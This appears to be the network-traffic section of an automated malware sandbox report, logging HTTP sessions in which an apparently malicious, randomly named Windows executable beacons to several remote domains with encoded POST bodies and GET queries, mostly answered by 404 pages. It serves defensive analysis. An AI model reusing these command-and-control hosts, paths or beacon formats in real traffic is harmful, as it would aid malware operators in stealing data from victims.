                                                                                                      Data Raw: 67 50 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 79 72 44 43 34 61 4f 37 49 47 4a 4f 71 74 54 6c 63 52 4d 4a 35 67 52 48 6e 79 2b 64 4f 4d 51 75 42 64 55 50 42 6d 4f 4e 4c 6b 41 48 53 65 4c 6f 48 48 62 45 68 32 72 55 30 41 4d 55 34 6e 49 48 55 7a 64 34 42 49 75 64 48 73 35 50 4b 38 34 39 61 50 49 34 39 42 4b 39 6e 58 39 65 34 33 31 2f 39 66 47 70 66 37 6c 59 67 57 51 45 6d 7a 47 66 5a 35 6c 2b 76 4b 49 37 32 2f 34 70 67 35 54 69 2f 70 33 41 7a 71 65 42 38 4b 2f 38 71 76 52 2b 6e 48 44 63 65 6f 7a 73 65 79 77 52 2b 4f 57 35 72 61 75 6d 78 74 68 65 61 5a 73 6a 2f 47 38 31 61 52 72 34 6b 37 35 7a 32 33 5a 49 66 73 57 73 4b 72 55 2f 73 32 45 49 52 52 35 41 54 73 51 77 55 4b 34 4f 44 34 78 2b 74 50 5a 76 6f 6b 39 2f 74 30 2f 36 39 4d 31 54 47 2b 68 72 63 56 52 75 69 51 69 39 46 39 35 45 37 42 57 35 38 70 55 76 57 39 77 2f 73 51 35 47 4b 6d 69 75 55 63 6a 74 36 7a 42 48 56 36 2f 54 2f 45 63 32 36 65 67 39 66 64 59 51 6d [TRUNCATED]
                                                                                                      Data Ascii: gP=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPygyrDC4aO7IGJOqtTlcRMJ5gRHny+dOMQuBdUPBmONLkAHSeLoHHbEh2rU0AMU4nIHUzd4BIudHs5PK849aPI49BK9nX9e431/9fGpf7lYgWQEmzGfZ5l+vKI72/4pg5Ti/p3AzqeB8K/8qvR+nHDceozseywR+OW5raumxtheaZsj/G81aRr4k75z23ZIfsWsKrU/s2EIRR5ATsQwUK4OD4x+tPZvok9/t0/69M1TG+hrcVRuiQi9F95E7BW58pUvW9w/sQ5GKmiuUcjt6zBHV6/T/Ec26eg9fdYQmOlCxaeUv12ATSaln1zZ8IUpmmFgLY1P8bc0Pj+5/H9iaOnmri/ogZVQgJOENMkS2DYqOLfI+F7JYdt+Mokpx1HBfjuCclNC+zo7ysNM739d4U2qv6CqMDbayCE31PS9+nO3ktgzwKV7qBKUqCZKkQx2D2Z9BwZp814sy/9wx2+7YPsMIzktFfkWyt76PSDOI5XqtwprD2TOTWlwbY2ifYvYQvyWE5Ukev2G8ZlL5GO3tE4OKrPXZyHSt0MQSfJBYSDCMXa8ndIzLooOtGAdaO7pjzjYrBO3KCW0OUYy878afFWC5l/EzCkT/SkQAU9925OMpTK3B/SDbg3PKk0iY3XCgDu6A5S5hqs65FisRKHgSKzhucK8b1ey5a2t4duV/lkzFvNFm/73XfpNKN0JzGB0/l3khc5x6t1DCp34S7qm+q0QZL+rxwHLtPpgGjeAqi1mipGm0cawFZ+ABGRlLXoANrQMW+t2XD7Vt3sUMkILc7gvMunUFhgmJ+/4Mld+NwzM5+/Hq4u36y75syj0fCfME+UUTEGo1YX1/R4y+pfttWWVHKt/j4HJbm15IcucH6kbHYUlHJuIoqz27gNWoHaEpOQOn2NIMPzpqz3a/6R/n/WptMMbMOCNl96GpKo+SdqhsIlsdVOLSLvMc3MSlGtDeai+S0I9rVg [TRUNCATED]
                                                                                                      Oct 8, 2024 15:55:58.941078901 CEST355INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:55:58 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.114999781.2.196.19803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:00.831670046 CEST464OUTGET /jsqu/?-L=kBMxZFRpAD6P&gP=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuAECuXdbdVwd/lx4BGGAWHgBLP9AhssTD5eI= HTTP/1.1
                                                                                                      Host: www.asociacia.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:56:01.492780924 CEST691INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:56:01 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.1149998107.163.130.249803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:06.935695887 CEST715OUTPOST /jyeu/ HTTP/1.1
                                                                                                      Host: www.93187.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.93187.xyz
                                                                                                      Referer: http://www.93187.xyz/jyeu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 67 6a 31 76 6f 61 38 33 34 37 58 77 6f 5a 43 77 62 76 38 57 47 30 30 78 54 31 46 63 39 54 38 4f 75 75 49 6c 6e 44 7a 57 37 77 43 6a 46 48 64 76 62 6a 55 63 72 34 38 34 63 6b 66 71 43 46 41 67 70 4a 79 31 2b 6e 51 42 59 34 43 68 59 32 35 5a 78 73 77 35 78 72 47 72 78 6e 59 73 69 37 52 70 48 41 66 43 4b 31 61 6a 54 36 75 51 36 37 6b 55 57 61 2b 55 48 45 41 56 71 2b 6b 52 2f 47 38 36 2f 5a 56 70 6e 6d 4d 4a 67 4d 6f 79 46 4f 67 38 34 7a 71 59 46 39 6e 4c 72 5a 31 62 32 51 39 36 32 6f 33 4c 2f 6f 58 5a 44 6c 72 6a 6a 75 75 51 68 66 6b 48 70 34 32 31 59 75 6f 42 50 69 6a 6b 77 3d 3d
                                                                                                      Data Ascii: gP=Hgj1voa8347XwoZCwbv8WG00xT1Fc9T8OuuIlnDzW7wCjFHdvbjUcr484ckfqCFAgpJy1+nQBY4ChY25Zxsw5xrGrxnYsi7RpHAfCK1ajT6uQ67kUWa+UHEAVq+kR/G86/ZVpnmMJgMoyFOg84zqYF9nLrZ1b2Q962o3L/oXZDlrjjuuQhfkHp421YuoBPijkw==
                                                                                                      Oct 8, 2024 15:56:07.827970028 CEST312INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:56:07 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 148
                                                                                                      Connection: close
                                                                                                      ETag: "66c48d46-94"
                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.1149999107.163.130.249803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:09.481554985 CEST735OUTPOST /jyeu/ HTTP/1.1
                                                                                                      Host: www.93187.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.93187.xyz
                                                                                                      Referer: http://www.93187.xyz/jyeu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 67 6a 31 76 6f 61 38 33 34 37 58 7a 49 70 43 79 36 76 38 51 6d 30 7a 76 44 31 46 54 64 54 43 4f 75 69 49 6c 69 37 6a 57 49 45 43 6a 6c 33 64 75 61 6a 55 62 72 34 38 7a 38 6b 67 70 79 46 62 67 70 4e 51 31 37 66 51 42 59 73 43 68 63 79 35 5a 42 51 78 35 68 72 45 69 52 6e 61 6f 69 37 52 70 48 41 66 43 4c 51 48 6a 54 69 75 52 4c 4c 6b 62 54 32 39 5a 6e 45 44 63 4b 2b 6b 47 50 47 34 36 2f 5a 38 70 6a 6d 69 4a 6d 41 6f 79 45 2b 67 38 70 7a 72 4e 56 39 68 50 72 59 4c 54 47 74 45 37 57 68 32 43 2b 4d 6e 59 51 70 61 6d 6c 2f 30 41 43 57 7a 45 36 77 30 68 2b 50 59 49 2b 48 71 2f 2b 6e 32 69 4e 30 64 46 66 33 48 44 6a 6a 59 79 37 41 43 4e 70 73 3d
                                                                                                      Data Ascii: gP=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWIECjl3duajUbr48z8kgpyFbgpNQ17fQBYsChcy5ZBQx5hrEiRnaoi7RpHAfCLQHjTiuRLLkbT29ZnEDcK+kGPG46/Z8pjmiJmAoyE+g8pzrNV9hPrYLTGtE7Wh2C+MnYQpaml/0ACWzE6w0h+PYI+Hq/+n2iN0dFf3HDjjYy7ACNps=
                                                                                                      Oct 8, 2024 15:56:10.342489958 CEST312INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:56:10 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 148
                                                                                                      Connection: close
                                                                                                      ETag: "66c48d46-94"
                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.1150000107.163.130.249803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:12.028846025 CEST1748OUTPOST /jyeu/ HTTP/1.1
                                                                                                      Host: www.93187.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.93187.xyz
                                                                                                      Referer: http://www.93187.xyz/jyeu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 67 6a 31 76 6f 61 38 33 34 37 58 7a 49 70 43 79 36 76 38 51 6d 30 7a 76 44 31 46 54 64 54 43 4f 75 69 49 6c 69 37 6a 57 4a 38 43 6a 57 2f 64 76 34 4c 55 61 72 34 38 77 38 6b 6c 70 79 46 61 67 74 70 55 31 37 62 66 42 61 55 43 68 2f 36 35 62 79 49 78 32 68 72 45 67 52 6e 62 73 69 37 45 70 48 51 62 43 4b 67 48 6a 54 69 75 52 49 6a 6b 66 47 61 39 62 6e 45 41 56 71 2b 34 52 2f 47 51 36 37 4e 47 70 6a 71 63 4a 32 67 6f 7a 6b 75 67 76 50 6e 72 51 6c 39 6a 43 4c 59 44 54 47 68 6c 37 57 74 41 43 2b 34 64 59 58 6c 61 72 54 36 72 45 54 2b 59 53 73 73 62 33 4f 2f 43 44 50 72 55 7a 63 62 56 74 38 39 69 51 72 2f 69 47 67 71 55 6a 4c 30 6d 5a 75 57 56 72 6b 36 6e 66 45 48 35 4e 6f 54 4c 66 48 4f 67 38 61 34 77 4b 69 38 59 39 75 49 6b 51 61 45 48 75 2f 7a 56 4a 77 34 65 6e 44 33 61 36 53 38 2f 71 65 4f 61 56 6e 30 66 4f 56 65 63 47 71 51 44 67 42 32 6c 68 59 62 64 4d 62 54 46 57 69 64 41 39 67 56 39 6d 37 7a 38 44 6c 54 34 4a 73 51 2b 7a 4f 4d 57 6d 5a 57 36 76 5a 30 61 6f 48 35 45 6c 59 4c 6d 72 5a 6f [TRUNCATED]
                                                                                                      Data Ascii: gP=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWJ8CjW/dv4LUar48w8klpyFagtpU17bfBaUCh/65byIx2hrEgRnbsi7EpHQbCKgHjTiuRIjkfGa9bnEAVq+4R/GQ67NGpjqcJ2gozkugvPnrQl9jCLYDTGhl7WtAC+4dYXlarT6rET+YSssb3O/CDPrUzcbVt89iQr/iGgqUjL0mZuWVrk6nfEH5NoTLfHOg8a4wKi8Y9uIkQaEHu/zVJw4enD3a6S8/qeOaVn0fOVecGqQDgB2lhYbdMbTFWidA9gV9m7z8DlT4JsQ+zOMWmZW6vZ0aoH5ElYLmrZo/jGDsiEco5T4f5eIUBDJsO5ZIo+BIiPlRT3c7kGKN1gGxnOKxpcF/oiqubRpjV1mIRUErvzhDhiCVwcZY/fPsqbmDiUgGlb0rXI6AmXjnabM+kBOZn2KMHfukBL6iwuufVryx/wqgZpn1Xa04gKqXU71wOfwZiyrY+rXRodkCR22KOqDZPuHiULm2qmR/YGJkfd0CJ7A1Nt3PnDYZDHFWW6Xnzl3qDTxDiO+1QRr/JNVHafu+1I8JLwVMpKTTLzwaKlAkcfSQddLXZY9N/WFcb7ruNMhi6I74lL/y+oVS5+ZNs0g08xA282RJ3ASfYGPIDNYGrUXJcvYVbNyclZ7WsrwYbBmSuFL3kY7Ifh0ZLSmLpJDW/g92NV3NES5eh52d8cTxEVB51KS//b1BYLdugtvJvWoL5BHgeDnOy9xsfqfOKt2hN91Nnq4kqCN6WDa6+rv/wVfVVjLgMTdjiGP8kjEAWFThoNfoZHUwO4DU/M9QTbiOtRO6lWll383uLJO7upLYuFhZpbOcr6GgnNOkoCAojU8NrWHJTwjSMdbVJebAjWdjZ6ePZQaNoi9nenponVl9sMiQZ2Xbo4cMYxKFNmjM35sm++W7f5rF8W09kTAWGBUhsgfhjy8V1wQxAJY+8Xg19v3NCIm/J/KWvb9Ycx4/bqmFdENgM [TRUNCATED]
                                                                                                      Oct 8, 2024 15:56:13.127681017 CEST312INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:56:12 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 148
                                                                                                      Connection: close
                                                                                                      ETag: "66c48d46-94"
                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.1150001107.163.130.249803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:14.563930035 CEST457OUTGET /jyeu/?gP=KiLVsdjbhLGFnrJehKTzSS0IkzcAWv/LJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY3/QPGqQrPglnah1puMp4IzQunG6SYXgyDdEY=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.93187.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:56:15.481507063 CEST312INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:56:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 148
                                                                                                      Connection: close
                                                                                                      ETag: "66c48d46-94"
                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                      Oct 8, 2024 15:56:15.742499113 CEST312INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:56:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 148
                                                                                                      Connection: close
                                                                                                      ETag: "66c48d46-94"
                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.1150002103.21.221.4803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:29.495868921 CEST754OUTPOST /abla/ HTTP/1.1
                                                                                                      Host: www.tempatmudisini01.click
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.tempatmudisini01.click
                                                                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4c 69 53 65 4a 32 6c 59 6c 71 36 6e 71 4f 59 6b 73 36 4e 31 59 4a 67 73 54 74 4a 33 55 4c 30 69 51 4d 30 58 32 63 50 71 54 59 6a 70 71 46 51 56 69 72 48 77 54 61 67 75 4a 2f 2b 41 64 58 6a 44 38 6c 6d 47 41 6e 50 73 55 50 62 52 45 43 72 6b 50 64 76 44 75 52 30 75 78 64 6d 78 7a 66 56 43 78 52 5a 6b 35 53 36 70 52 4c 42 50 37 46 56 6f 5a 76 6e 64 4f 76 7a 55 65 51 51 37 63 56 6f 6f 73 57 39 39 37 63 5a 70 71 57 37 6f 69 73 63 68 76 61 48 2b 6e 56 6c 58 71 6a 54 62 54 73 4f 6c 50 45 41 73 36 4c 31 65 35 6e 47 75 39 61 62 6c 2f 62 35 74 77 51 3d 3d
                                                                                                      Data Ascii: gP=c/pvFaX75Hx8LiSeJ2lYlq6nqOYks6N1YJgsTtJ3UL0iQM0X2cPqTYjpqFQVirHwTaguJ/+AdXjD8lmGAnPsUPbRECrkPdvDuR0uxdmxzfVCxRZk5S6pRLBP7FVoZvndOvzUeQQ7cVoosW997cZpqW7oischvaH+nVlXqjTbTsOlPEAs6L1e5nGu9abl/b5twQ==
                                                                                                      Oct 8, 2024 15:56:30.980561972 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                      x-litespeed-tag: 894_HTTP.404
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                      x-litespeed-cache-control: no-cache
                                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: br
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 08 Oct 2024 13:56:30 GMT
                                                                                                      server: LiteSpeed
